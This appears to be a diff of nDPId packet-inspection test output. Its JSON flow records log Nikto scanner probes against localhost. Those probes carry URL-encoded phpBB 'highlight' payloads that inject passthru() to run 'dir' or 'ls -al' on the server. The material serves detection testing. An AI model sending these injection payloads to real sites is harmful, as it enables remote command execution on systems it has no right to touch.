{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01192{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="} -01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} +01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 